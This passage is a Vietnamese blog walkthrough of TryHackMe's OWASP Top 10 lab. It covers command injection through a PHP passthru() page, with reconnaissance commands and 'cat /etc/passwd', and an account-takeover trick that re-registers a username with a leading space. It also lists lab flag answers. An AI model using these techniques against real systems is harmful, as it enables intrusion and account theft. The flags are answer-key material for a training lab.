<li>Sau đó, chương trình đi vào một khối lệnh try để thực thi hàm <strong class="ib da">passthru($command_string)</strong>. Bạn có thể đọc tài liệu về hàm passthru() trên trang web của PHP, nhưng nói chung, nó sẽ thực thi những gì được nhập vào trường đầu vào, sau đó chuyển đầu ra trực tiếp trở lại trình duyệt.</li>
<li>Nếu không thành công, nó sẽ báo lỗi. Nói chung, thì nó cũng không xuất ra cái gì đâu vì bạn không thể xuất ra <a href="http://centos-vn.blogspot.com/2013/12/stdinstdoutstderr.html#:~:text=STDERR%20l%C3%A0%20d%C3%B2ng%20xu%E1%BA%A5t%20l%E1%BB%97i,th%E1%BB%91ng%20s%E1%BA%BD%20t%E1%BB%B1%20t%E1%BA%A1o%20ra)." target="_blank" rel="noopener">stderr.</a></li>
</ol>
<p><strong>Các cách phát hiện Active Command Injection</strong></p>
<p>ACI xảy ra khi bạn có thể thấy phản hồi từ lệnh gọi của hệ thống (system call). Trong đoạn code trên, hàm <strong class="ib da">passthru()</strong> chuyển phản hồi trực tiếp đến tài liệu để bạn có thể thấy. Lệnh này sẽ giúp bạn dễ dàng xem và phân tích các lỗi của hệ thống.</p>
<p><strong>Các lệnh có thể thử</strong></p>
<p id="6bbe" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw dn gr" data-selectable-paragraph=""><strong class="ib da">Linux</strong></p>
<ul class="">
<li id="c00d" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw jk jl jm gr" data-selectable-paragraph="">whoami</li>
<li id="5fb5" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">id</li>
<li id="7720" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">ifconfig/ip addr</li>
<li id="cb48" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">uname -a</li>
<li id="5435" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">ps -ef</li>
</ul>
<p id="05dd" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw dn gr" data-selectable-paragraph=""><strong class="ib da">Windows</strong></p>
<ul class="">
<li id="d15d" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw jk jl jm gr" data-selectable-paragraph="">whoami</li>
<li id="0817" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">ver</li>
<li id="f839" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">ipconfig</li>
<li id="37fe" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">tasklist</li>
<li id="c086" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">nestat -an</li>
</ul>
<p>Để trả lời những câu hỏi bên dưới thì bạn cần điều hướng đến <a href="http://10.10.147.50/evilshell.php">http://10.10.147.50/evilshell.php.</a></p>
<h4># 1 Tập tin văn bản lạ nào nằm trong thư mục root của trang web?</h4>
<p>Chúng ta có thể truy cập evilhell.php và thử lệnh whoami.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_8fV_l8QsQya_YZzDL1Vitg.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 49" width="525" height="404" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 81"></p>
<p>&nbsp;</p>
<p>Thử tiếp lệnh <code>uname -a</code>.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_xwUOsPsRpCPKUOeU99vUPQ.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 50" width="525" height="399" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 82"></p>
<p>Tiếp tục thử lệnh <code>ls</code>.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_DakOlOzD46OiuE9VfzGQ1g.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 51" width="525" height="392" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 83"></p>
<p>Các bạn thấy gì không? Mình tìm được file drpepper.txt.</p>
<h4>#2 Có bao nhiêu người dùng không phải root/non-service/non-daemon?</h4>
<p>Bạn có thể thử lệnh<code> cat /etc/passwd</code></p>
<p>&nbsp;</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_2Lvbf0U3RwrNxi0lBu0D5A.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 52" width="525" height="558" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 84"></p>
<p>Không tìm được gì cả.</p>
<h4>#3 Ứng dụng này đang chạy với tư cách người dùng nào?</h4>
<p>Chúng tôi đã tìm thấy nó ở tầng trên, nhưng chúng ta hãy viết lại lệnh whoami.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_8fV_l8QsQya_YZzDL1Vitg.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 49" width="525" height="404" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 81"></p>
<p><strong>Đáp án:</strong> www-data</p>
<h4>#4 Shell của người dùng?</h4>
<p>Chúng ta có thể tìm thấy nó bằng lệnh cat /etc/passwd.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_1qBRRcXVPtEdEWoRp7uEkA.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 54" width="422" height="69" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 86"></p>
<p><strong>Đáp án:</strong> usr/sbin/nologin</p>
<h4>#5 Phiên bản Ubuntu đang chạy?</h4>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_tgRFYDHuo5SJYF2PJZ8_9A.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 55" width="700" height="388" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 87"></p>
<p>Như ảnh trên, các bạn chỉ cần nhập lệnh<code> lsb_release -a</code> để biết phiên bản Ubuntu ứng dụng đang chạy.</p>
<p><strong>Đáp án:</strong> 18.04.4</p>
<h4>#6 Xem MOTD</h4>
<p>Chỉ cần tìm kiếm một chút trên internet là bạn sẽ biết lệnh hiển thị MOTD. MOTD (Message Of The Day) là đoạn tin nhắn khi bạn khởi động một ứng dụng trong terminal.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_jLfpOm0ZYjCFdb9UEAhHuw.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 56" width="525" height="436" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 88"></p>
<div class="TnITTtw-t TnITTtw-inside-layout">
<div class="TnITTtw-t TnITTtw-content">
<div class="TnITTtw-t TnITTtw-help-selected-wrap TnITTtw-hsw-54 TnITTtw-has-bottom-arr0w">
<div class="TnITTtw-t TnITTtw-help-inside-layout TnITTtw-hil-54">
<div id="TnITTtw-trVisibleLayout-54" class="TnITTtw-trVisibleLayout TnITTtw-t">
<div id="TnITTtw-trEntireLayout-54" class="TnITTtw-trEntireLayout TnITTtw-t">
<div class="TnITTtw-t TnITTtw-content-layout TnITTtw-content-layout-54">
<div class="TnITTtw-padded-single-translation TnITTtw-trans-wrap TnITTtw-t">
<div class="TnITTtw-tpart TnITTtw-t">Đường dẫn của file MOTD là  /etc/update-motd.d. Mình đã làm thử, nhưng không có gì cả. Bí quá nên quyết định quay lại xem gợi ý :v.</div>
<div class="TnITTtw-mv-translit TnITTtw-translation-translit TnITTtw-t"><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_-VfWtYoDRwBbUZq9XMbl0g.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 57" width="402" height="97" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 89"></div>
<div>cat /etc/update-motd.d/00-header</div>
<div></div>
<div class="TnITTtw-more-butt0n TnITTtw-t iw-mTrigger" data-to="vi"><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_0BrDecJbGLsI4AIVhY1h_w.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 58" width="525" height="518" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 90"></div>
<div data-to="vi">Thành công!</div>
<div data-to="vi"><strong>Đáp án:</strong> DR PEPPER</div>
<h3 data-to="vi">Nhiệm vụ 7: [Mức độ nghiêm trọng 2] Broken Authentication</h3>
<p>Đối với lỗ hổng này, chúng ta sẽ nghiên cứu một lỗ hổng logic trong cơ chế xác thực.</p>
<p>Các nhà phát triển thường quên lọc đầu vào (tên người dùng và mật khẩu) do người dùng cung cấp trong ứng dụng của họ, điều này có thể khiến ứng dụng dễ bị tấn công SQL injection. Và chúng ta sẽ tập trung vào một lỗ hổng bảo mật xảy ra do lỗi của nhà phát triển nhưng rất dễ bị khai thác &#8211; đăng ký lại người dùng hiện có.</p>
<div class="TnITTtw-ico-listen TnITTtw-listen-butt0n TnITTtw-listen-translation TnITTtw-t" data-to="vi">Ví dụ, giả sử có một người dùng hiện có với tên admin và bây giờ chúng ta muốn có quyền truy cập vào tài khoản đó, vì vậy những gì chúng ta có thể làm là cố gắng đăng ký lại tên người dùng đó nhưng có sửa đổi lại một chút. Chúng ta sẽ nhập “ admin” (lưu ý khoảng trống ở đầu). Bây giờ khi bạn nhập thông tin đó vào trường username và nhập các thông tin cần thiết khác như email hoặc mật khẩu và gửi dữ liệu đó. Nó sẽ đăng ký một người dùng mới nhưng người dùng đó sẽ có quyền giống như quản trị viên bình thường. Người dùng mới đó cũng sẽ có thể xem tất cả nội dung được trình bày dưới quyền quản trị viên người dùng.</div>
<div data-to="vi">Để xem demo, hãy truy cập trang web http://10.10.147.50:8888 và thử đăng ký username, bạn sẽ thấy người dùng đó đã tồn tại, vì vậy hãy thử đăng ký một người dùng “ darren” và bạn sẽ thấy rằng mình hiện đã đăng nhập và sẽ có thể xem nội dung chỉ có trong tài khoản của Darren, và đây là lúc chúng ta khai thác lỗ hổng này.</div>
<div data-to="vi"></div>
</div>
</div>
</div>
</div>
<div id="TnITTtw-tr-scrollbar-54" class="TnITTtw-tr-scrollbar TnITTtw-t">
<div id="TnITTtw-track-54" class="TnITTtw-track TnITTtw-t">
<h4 id="TnITTtw-dragBar-54" class="TnITTtw-dragBar TnITTtw-t"># 1 Flag mà bạn tìm thấy trong tài khoản của darren là gì?</h4>
<p>Truy cập trang web http://10.10.147.50:8888.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_zlVnVTGlMBxj91jBYoKbTg.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 59" width="525" height="207" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 91"></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_Dc_UP6UknviIYh4qR5W4Qw.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 60" width="511" height="468" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 92"></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Mình đang cố gắng đăng ký với tư cách là darren.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_pKME8r2QnCWGB1OV9l7Fqg.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 61" width="525" height="171" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 93"></p>
<p>Áp dụng lý thuyết ở trên.</p>
<p>&nbsp;</p>
</div>
</div>
</div>
</div>
</div>
</div>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_Dc_UP6UknviIYh4qR5W4Qw.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 60" width="511" height="468" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 92"></p>
<p>Mình để một khoảng trắng ở trước từ darren.</p>
<p>Mình đang đăng nhập với tư cách là thành viên. Thành công rồi nè!</p>
<p>Chúng ta đã tìm ra được flag.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_x7K9YPxkHgz_3I83DfUDnw.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 63" width="525" height="200" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 95"></p>
<p>&nbsp;</p>
<p><strong>Đáp án:</strong> fe86079416a21a3c99937fea8874b667</p>
<h4>#2 Bây giờ hãy thử thực hiện thủ thuật tương tự và xem liệu bạn có thể đăng nhập bằng tài khoản arthur hay không.</h4>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_tmWl4KqK3mM6tZH4itkPUA.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 64" width="525" height="483" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 96"></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_pKME8r2QnCWGB1OV9l7Fqg.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 61" width="525" height="171" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 93"></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_TvQuX_RAIZvzEGYh9JpF8g.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 66" width="472" height="360" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 98"></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_zlVnVTGlMBxj91jBYoKbTg.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 59" width="525" height="207" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 91"></p>
<h4># 3 Flag mà bạn tìm thấy trong tài khoản của arthur là gì?</h4>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_pxP47vPptHfBR71n3ZttaQ.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 68" width="509" height="163" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 100"></p>
<p><strong>Đáp án:</strong> d9ac0f7db4fda460ac3edeb75d75e16e</p>
<p>Hoàn thành 2 lỗi phổ biến trong OWASP 10 là Broken Authentication và Command Injection.</p>
<p>Phần tiếp theo vẫn sẽ là khai thác các lỗi khác trong OWASP 10 nữa nhé.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>OWASP Top 10 trên TryHackMe là gì?</h3>
<p>Thử thách OWASP Top 10 trên TryHackMe là một môi trường học tập thực hành cho phép bạn khám phá và khai thác 10 lỗ hổng bảo mật web quan trọng nhất, dựa trên danh sách OWASP Top 10.</p>
<h3>Tôi có cần kiến thức kỹ thuật sâu rộng để tham gia thử thách này không?</h3>
<p>Không cần thiết. Bài viết hướng dẫn tập trung vào thực hành, bạn có thể tìm hiểu thêm kiến thức kỹ thuật trong phòng học TryHackMe nếu cần.</p>
<h3>Tôi có thể tìm thấy câu trả lời cho các câu hỏi trong bài viết ở đâu?</h3>
<p>Bạn cần truy cập vào địa chỉ  <code>http://10.10.147.50/evilshell.php</code> và sử dụng các lệnh được đề cập trong bài viết để tìm ra câu trả lời.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/tryhackme-thu-thach-owasp-top-10-phan-1/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
